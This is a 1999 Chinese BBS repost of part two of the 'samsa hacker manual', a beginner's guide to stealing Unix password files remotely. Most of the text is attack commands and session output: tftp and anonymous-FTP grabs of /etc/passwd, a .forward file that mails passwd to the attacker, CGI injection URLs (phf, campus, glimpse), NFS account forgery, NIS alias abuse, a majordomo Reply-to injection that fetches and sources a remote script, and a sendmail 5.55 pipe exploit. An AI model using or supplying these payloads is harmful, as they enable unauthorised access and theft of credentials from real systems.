返回列表 回复 发帖

samsa黑客手册2

samsa黑客手册,适合入门(2)
发言者:hacktxt
发表时间:2000年1月23日 19时41分57秒
来自202.96.189.17)
发信人: HotFox.bbs@bbs.whnet.edu.cn (北约与狗不得入内), 信区: Internet
标 题: samsa 黑客手册:隔空取物
发信站: 武汉白云黄鹤站 (Tue Jun 1 16:53:30 1999)
转信站: argo!news.zsu.edu.cn!whunews!whbbs
【 以下文字转载自 Encrypt 讨论区 】
【 原文由 acat.bbs@bbs.whu.edu.cn 所发表 】
※ [本文转录自 SMTH_comp 看板]
发信人: samsa (沙门~屏绝进取,一意著书), 信区: Hacker
标 题: samsa 黑客手册:隔空取物
时 间: BBS 水木清华站 (Mon May 24 13:41:47 1999)
作者[samsa]
二、隔山打牛(远程攻击)
1) 隔空取物:取得passwd
1.1) tftp
# tftp numen
tftp> get /etc/passwd
Error code 2: Access violation
tftp> get /etc/shadow
Error code 2: Access violation
tftp> quit
(samsa:一无所获,但是...)
# tftp sun8
tftp> get /etc/passwd
Received 965 bytes in 0.1 seconds
tftp> get /etc/shadow
Error code 2: Access violation
(samsa:成功了!!!;-)
# cat passwd
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
ylx:x:10007:10::/users/ylx:/bin/sh
wzhou:x:10020:10::/users/wzhou:/bin/sh
wzhang:x:10101:4:Walt Whiteman:/users/wzhang:/sbin/sh
(samsa:可惜是shadow过了的:-/)
1.2) 匿名ftp
1.2.1) 直接获得
# ftp sun8
Connected to sun8.
220 sun8 FTP server (UNIX(r) System V Release 4.0) ready.
Name (sun8:root): anonymous
331 Guest login ok, send ident as password.
Password:
(samsa:your e-mail address,当然,是假的:-&gt
230 Guest login ok, access restrictions apply.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.168.0.198,34243) (0 bytes).
bin
dev
etc
incoming
pub
usr
226 ASCII Transfer complete.
35 bytes received in 0.85 seconds (0.04 Kbytes/s)
ftp> cd etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.168.0.198,34244) (0 bytes).
group
passwd
226 ASCII Transfer complete.
15 bytes received in 0.083 seconds (0.18 Kbytes/s)
15 bytes received in 0.083 seconds (0.18 Kbytes/s)
ftp> get passwd
200 PORT command successful.
150 ASCII data connection for passwd (192.168.0.198,34245) (223 bytes).
226 ASCII Transfer complete.
local: passwd remote: passwd
231 bytes received in 0.038 seconds (5.98 Kbytes/s)
# cat passwd
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nobody:x:60001:60001:Nobody:/:
ftp:x:210:12::/export/ftp:/bin/false
(samsa:正常!把完整的 passwd 放在匿名ftp目录下的笨蛋太少了)
1.2.2) ftp 主目录可写
# cat forward_sucker_file
-| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr-
# ftp victim.com
Connected to victim.com
220 victim FTP server ready.
Name (victim.com:zen): ftp
331 Guest login ok, send ident as password.
Password:[your e-mail address:forged]
230 Guest login ok, access restrictions apply.
ftp> put forward_sucker_file .forward
43 bytes sent in 0.0015 seconds (28 Kbytes/s)
ftp> quit
# echo test | mail ftp@victim.com
(samsa:等着passwd文件随邮件来到吧...)
1.3) WWW
著名的cgi大bug
1.3.1) phf
http://silly.com/cgi-bin/nph-test-cgi?*
http://silly.com/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
1.3.2) campus
http://silly.edu/cgi-bin/campus?%0a/bin/cat%0a/etc/passwd
%0a/bin/cat%0a/etc/passwd
1.3.3) glimpse
http://silly.com/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5me\mailto:@my.e-mail.
addr\
(samsa:行太长,折了折,不要紧吧? ;-)
1.4) nfs
1.4.1) 如果把/etc共享出来,就不必说了
1.4.2) 如果某用户的主目录共享出来
# showmount -e numen
export list for numen:
/space/users/lpf sun9
/space/users/zw (everyone)
# mount -F nfs numen:/space/users/zw /mnt
# cd /mnt
# ls -ld .
drwxr-xr-x 6 1005 staff 2560 1999 5月 11 .
# echo zw:x:1005:1:temporary break-in account:/:/bin/sh >> /etc/passwd
# echo zw::::::::: >> /etc/shadow
# su zw
$ cat >.forward
$ cat >.forward
-| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr-
^D
# echo test | mail zw@numen
(samsa:等着你的邮件吧....)
1.5) sniffer
利用ethernet的广播性质,偷听网络上经过的IP包,从而获得口令。
关于sniffer的原理和技术细节,见[samsa 1999].
(samsa:没什么意思,有种``胜之不武''的感觉...)
1.6) NIS
1.6.1) 猜测域名,然后用ypcat(或对于NIS+:niscat)可获得passwd(甚至shadow)
1.6.2) 若能控制NIS服务器,可创建邮件别名
nis-master # echo 'foo: -| mail me@my.e-mail.addr > /etc/alias
s
nis-master # cd /var/yp
nis-master # make aliases
nis-master # echo test | mail -v foo@victim.com
1.7) e-mail
e.g.利用majordomo(ver. 1.94.3)的漏洞
Reply-to: a~.`/usr/bin/rcp\${IFS}me@hacker.home.edu:script\${IFS}/tmp
/script;;source\${IFS}/tmp/script`.q~a/ad=cucu/c=scapegoat\\\@his.e-mail
# cat script
/bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr
#
1.8) sendmail
利用sendmail 5.55的漏洞:
# telnet victim.com 25
Trying xxx.xxx.xxx.xxx...
Connected to victim.com
Escape character is '^]'.
220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
mail from: -|/bin/mail me@my.e-mail.addr 250 -|/bin/mail me@my.e-mail.addr rcpt to: nosuchuser
550 nosuchuser... User unknown
data
354 Enter mail, end with -.- on a line by itself
..
250 Mail accepted
quit
Connection closed by foreign host.
(samsa:wait...)
--
“虽华艳而乏天趣,徒奇崛而无深意。...惟以其文体
为他人所未试,足称独步而已。”
——鲁迅《中国小说史略》
※ 来源:BBS 水木清华站 bbs.net.tsinghua.edu.cniddot;[FROM: argo.zsu.edu.cn]
--
※ 转载:.武汉白云黄鹤站 bbs.whnet.edu.cn.[FROM: 202.114.16.159]
返回列表